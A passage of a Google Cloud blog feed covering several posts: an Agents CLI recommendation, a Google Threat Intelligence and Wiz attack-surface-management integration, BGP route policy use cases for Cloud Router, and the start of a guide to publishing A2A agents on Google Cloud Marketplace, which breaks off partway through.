&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recommend using the &lt;/span&gt;&lt;a href="https://github.com/google/agents-cli" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agents CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;in Agent Platform as the central command tool for your development teams. It acts as a direct bridge between local terminal work and live production management, making it much easier for developers to transition from testing to a live launch. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It also allows your teams to version-control agent configurations, run automated evaluations, and seamlessly push updates through your existing CI/CD pipelines. Because the underlying tools and skills are built and rigorously tested by Google's experts, your team can deploy with confidence without having to reinvent the wheel or break their day-to-day coding workflows.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with Agents CLI &lt;/span&gt;&lt;a href="https://github.com/google/agents-cli" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started today&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By tackling these 20 questions early, you can build agents that actually do real work for your business — without keeping your security and operations teams up at night.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Get started with Gemini Enterprise Agent Platform &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/20-questions-for-the-agentic-enterprise" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/drive-proactive-security-prioritize-risks-with-google-threat-intelligence-and-wiz-asm</id>
    <title>Drive proactive security, prioritize risks with Google Threat Intelligence and Wiz ASM</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Being more proactive continues to be a leading goal for security organizations. As AI accelerates the pace of vulnerability discovery and exploitation, organizations will rely on the personalization of their security investments to help prioritize their defenses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you be more proactive by matching your real-world exposures with real-time adversary activity, we’ve begun integration efforts between &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/threat-intelligence"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Threat Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://www.wiz.io/blog/introducing-wiz-asm" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz Attack Surface Management&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ASM).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By connecting exposure and validated exploitable risks directly to real-time threat intelligence, we can help you detect and prioritize external-facing exploitable issues and uncover logic-driven vulnerabilities with AI scanning at the speed needed for today’s defenses. This allows you to shift to a strategy that prioritizes actions based on the real-world threats that pose the greatest risks to your organization.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Combining these two perspectives on threats can help you move from reactive maintenance to a proactive security strategy. In addition to detecting your exploitable exposures, you gain insight into which of those exposures are being actively targeted by adversaries. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1-ASM screenshot" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_laDzJlZ.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will continue to build towards native integration that will feed exposure data directly into the Google Threat Intelligence correlation engine. This automated connection will help you focus on the exposures adversaries are targeting in the wild, and use our real-time threat intelligence to prioritize remediation efforts and threat hunting activities.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building a proactive security strategy&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Threat Intelligence provides global visibility into how adversaries operate, tracking their infrastructure and campaign activity in real time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wiz ASM maps your external attack surface across cloud, AI, software-as-a-service (SaaS), and on-premises environments to reveal exposed assets like domains, IPs, and APIs. It scans for exploitable vulnerabilities, misconfigurations, and default credentials to validate exploitability. It also scans for and validates exposed secrets and sensitive data. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the same time, the Wiz Red Agent scans exposures with AI to uncover complex, logic-driven vulnerabilities by reasoning about applications behavior.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The power of this combination lies in the ability to prioritize and hunt with confidence:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prioritize based on real-world activity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: With the incoming integration, exposure data feeds into the Google Threat Intelligence engine. This helps you spot the exposures that adversaries are currently exploiting, allowing your team to focus remediation efforts where they are needed most.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Understand attacker behavior&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: When a critical risk is flagged, we plan to provide behavior-based guidance alongside the alert. This details how an attacker typically acts after exploiting a vulnerability, using specific host commands or malware, giving your defenders the context they need to hunt for active footprints inside your network.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Discover complex vulnerabilities&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The Wiz Red Agent uses AI to scan for logic-driven vulnerabilities, such as authentication bypasses, business logic flaws, and multi-step attack chains, helping you uncover risks that traditional scanners often miss.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started with proactive defense&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This combined approach is designed to help you streamline your security posture by reducing the noise and focusing on the signals that represent real danger to your organization. To get started with Google Threat Intelligence and Wiz ASM today, contact your &lt;/span&gt;&lt;a href="https://cloud.google.com/security/resources/google-threat-intelligence-demo?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google sales representative&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/drive-proactive-security-prioritize-risks-with-google-threat-intelligence-and-wiz-asm" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/networking/bgp-route-policies-top-3-use-cases-by-customer-demand</id>
    <title>BGP route policies: Top 3 use cases by customer demand</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When we first made &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-connectivity/docs/router/concepts/bgp-route-policies-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BGP route policies for Cloud Router&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; generally available over a year ago, our goal was to give network administrators deep, programmable control over how network paths are evaluated and propagated. Since then, we’ve been watching closely how our customers have adopted this feature. We've seen network engineering teams build incredibly sophisticated, resilient routing architectures that were previously difficult to achieve without third-party virtual appliances.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This year, we launched &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-connectivity/docs/router/release-notes#March_24_2026"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;policy named sets for Cloud Router&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. As routing environments grow more complex, managing individual prefixes or communities within these policies can become cumbersome. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Policy named sets solve this by allowing you to group lists of IPv4/IPv6 prefixes or BGP communities into a single, reusable entity. This significantly simplifies your configurations, making it easier to scale, manage, and update your routing rules across multiple Cloud Routers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by the Common Expression Language (CEL), BGP route policies allow you to define fine-grained, ordered rules to filter BGP routes and modify route attributes directly within Cloud Router.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To celebrate the launch of policy named sets, we want to highlight three of the most impactful ways we've seen customers use BGP route policies over the past year, along with resources on how you can build them yourself.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;1. The foundation: Route filtering and network protection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before manipulating traffic paths, network stability requires strict control over which routes are allowed into and out of your network. We've seen customers extensively use BGP route policies to filter out unwanted learned routes from peers or prevent specific subnet prefixes from being advertised out of their Virtual Private Cloud (VPC).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating on a "fail open" model by default, many security-conscious organizations have adapted BGP route policies to create a "fail closed" environment — appending a "drop all" policy as the final term in their evaluation list. This helps enable absolute certainty over accepted network routes, preventing routing loops and ensuring traffic isn't BGP hijacked or inadvertently blackholed.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dive deeper:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; For a foundational look at how to set up CEL expressions for route filtering, check out our deep-dive guide:&lt;/span&gt; &lt;a href="https://medium.com/google-cloud/google-cloud-router-introduction-to-bgp-policies-9983ac7ab484" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Introduction to BGP policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Influencing traffic paths for active/standby architectures&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Achieving optimal traffic distribution often requires forcing traffic down a specific path, whether for cost optimization or managing active/standby interconnects. Customers have used BGP route policies to influence the preferred BGP route without touching their on-premises hardware.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By dynamically modifying the BGP multi-exit discriminator (MED) attribute, network teams can make a specific peer preferred for incoming traffic. Conversely, if they want to steer traffic away from a congested or backup link, they are using AS-PATH prepending — adding one or more values to the route's AS-PATH to deprioritize it across the broader network.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dive deeper:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To see the configuration steps for managing MED and AS-Path prepending, read:&lt;/span&gt;&lt;a href="https://medium.com/google-cloud/google-cloud-router-using-bgp-policies-to-influence-traffic-paths-b1f302bd0cca" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Using BGP policies to influence traffic paths&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Solving asymmetric routing with BGP communities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;One of the most advanced and highly requested use cases we’ve seen over the last year is achieving traffic symmetry. When enterprises use stateful firewalls or specific network appliances on-premises, return traffic &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;must&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; flow back through the exact same appliance it originated from. If it doesn't, the traffic is dropped.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Customers are successfully solving this by using BGP route policies to match against specific standard &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;BGP communities&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. By tagging routes with specific communities on-premises, Cloud Router can read those tags via inbound policies and adjust the route preference by manipulating the MED accordingly. This helps ensure that Google Cloud inherently understands the stateful topology of the on-premises network and routes the return traffic symmetrically.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dive deeper:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To learn how to architect stateful traffic symmetry using BGP community tags, explore:&lt;/span&gt; &lt;a href="https://medium.com/google-cloud/google-cloud-router-using-bgp-policies-to-use-bgp-communities-to-create-traffic-symmetry-4b4a959dccfa" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Using BGP communities to create traffic symmetry&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Taking control of your dynamic routing is now easier and more robust than ever. Using BGP route policies, it's a great time to optimize and secure your hybrid cloud connectivity.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recommend testing your BGP route policies in a staging environment to verify your CEL expressions and routing logic before rolling them out to production. To explore the technical documentation, check out the&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/network-connectivity/docs/router/concepts/bgp-route-policies-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BGP route policies overview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/networking/bgp-route-policies-top-3-use-cases-by-customer-demand" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/publish-agents-in-gemini-enterprise-and-google-cloud-marketplace</id>
    <title>A developer's guide to publishing agents in Gemini Enterprise and Google Cloud Marketplace</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Software-as-a-service (SaaS) is evolving into Agents-as-a-service (AaaS).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of isolated applications, developers are creating &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/partner-built-agents-available-in-gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that interoperate using standardized open protocols such as the &lt;/span&gt;&lt;a href="https://a2a-protocol.org/latest/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent2Agent (A2A)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; protocol and can be orchestrated through centralized agent platforms like Gemini Enterprise Agent Platform.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When building for your specific use case, we believe the goal should always be to engineer high-quality agents that combine autonomy with the ability to reliably execute complex, multi-step workflows that deliver clear business value. For agent builders and developers looking to publish and commercialize these high-impact, third-party agents through &lt;/span&gt;&lt;a href="https://console.cloud.google.com/marketplace/browse?filter=solution-type:ai-agent-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Marketplace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and to deploy them to the &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=1713762-Gemini_Enterprise-DR-NA-US-en-Google-BKWS-EXA-GEnterprise&amp;amp;utm_content=c-Hybrid+%7C+BKWS+-+MIX+%7C+Txt_Gemini+Enterprise-189528400785&amp;amp;utm_term=gemini+enterprise+app&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=23370621055&amp;amp;gclid=CjwKCAjwt7XQBhBkEiwAtStpp6iU5Y4rUV1NHoVbW1Y-6tphSJlmMbYd0fiYs_9cWdP0SyN5WFaNgxoCFKAQAvD_BwE&amp;amp;e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise app&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this guide provides a step-by-step path to a fully integrated, marketplace-ready solution.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 1: Design your agent architecture for integration with Marketplace&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The end-state architecture bridges Google Cloud Marketplace billing, identity provider (IdP) security, and Gemini Enterprise Agent Platform.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1 - ref architecture" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_-_ref_architecture.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s an overview of these architectural elements:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Customer project:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Where users discover agents via the dedicated Agent Marketplace category within &lt;/span&gt;&lt;a href="https://console.cloud.google.com/marketplace/browse?filter=solution-type:ai-agent-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Marketplace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and interact with these agents through the &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; app.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Partner project:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Hosts your agent as well as the marketplace handler, which handles the logic for procurement, and Dynamic Client Registration (DCR) for authorization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Partner Marketplace project: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Manages the Partner Procurement API and Pub/Sub topics for Marketplace events like account creation or entitlement approvals.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 2: Review the organizational requirements to sell on Marketplace&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Google Cloud Partner Network&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: If you're new to offering your solutions on Marketplace, join the &lt;/span&gt;&lt;a href="https://partners.cloud.google.com/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Partner Network&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Review Agent-as-a-Service listing requirements.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Verify that your organization meets the requirements to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/offer-products"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;list your solutions on Marketplace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Marketplace Vendor Agreement:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Review and accept the &lt;/span&gt;&lt;a href="https://cloud.google.com/terms/marketplace-vendor-agreement"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Marketplace Vendor Agreement&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (MVA).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Nominate your agent for Google Cloud Marketplace&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; by contacting your Google Cloud representative.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All agents listed on Marketplace must comply with the above standard requirements plus several agent-specific mandates:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Define your agent use case: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We recommend defining specific, agentic use cases targeting high-value enterprise functions designed to solve tangible pain points and scale across multiple enterprise customers.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;A2A protocol adherence:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agents must comply with the &lt;/span&gt;&lt;a href="https://a2a-protocol.org/latest/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2A&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; protocol specifications for interoperability. This can include the &lt;/span&gt;&lt;a href="https://a2ui.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2UI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; protocol which enables your agents to generate rich, interactive user interfaces.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;A2A Agent Card: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Create an &lt;/span&gt;&lt;a href="https://a2a-protocol.org/dev/specification/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Card&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a JSON file declaring capabilities (skills), authentication methods, and service endpoints.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Authentication:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agents must support public access or &lt;/span&gt;&lt;a href="https://datatracker.ietf.org/doc/html/rfc7591" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OAuth 2.0 Authorization Code Grant Flow&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Marketplace integration: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Mandatory integration with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/integrated-saas/backend-integration"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Procurement APIs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Pub/Sub for entitlement lifecycle management.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 3: Review the technical requirements for your agent to be compatible with Marketplace and the Gemini Enterprise app&lt;/span&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A2A protocol&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When designing and implementing your agent, ensure you follow the &lt;/span&gt;&lt;a href="https://a2a-protocol.org/latest/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2A protocol documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This will guide you on choices for interaction patterns (e.g., streaming or asynchronous tasks) that your agent can provide and can include incorporating an interactive UI experience using the &lt;/span&gt;&lt;a href="https://a2ui.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2UI protocol&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Using A2UI allows you to leverage the latest and greatest UX controls available—such as advanced, dynamic charts and modern interaction models. By utilizing these native user controls, you ensure your agent doesn't just function reliably, but looks, feels, and operates with a premium sense of "pride in craft" inside the Gemini Enterprise app.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A2A agent card&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To list your Agent-as-a-Service product on the Marketplace, you must provide an &lt;/span&gt;&lt;a href="https://a2a-protocol.org/dev/specification/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2A Agent Card&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for your agent. The Agent Card is a JSON file declaring the agent's capabilities (skills), supported authentication &amp;amp; authorization methods, and service endpoints.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Gemini Enterprise app relies on your Agent Card to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Display your agent name, description, and other necessary metadata.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Locate endpoints for Dynamic Client Registration (if supported).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
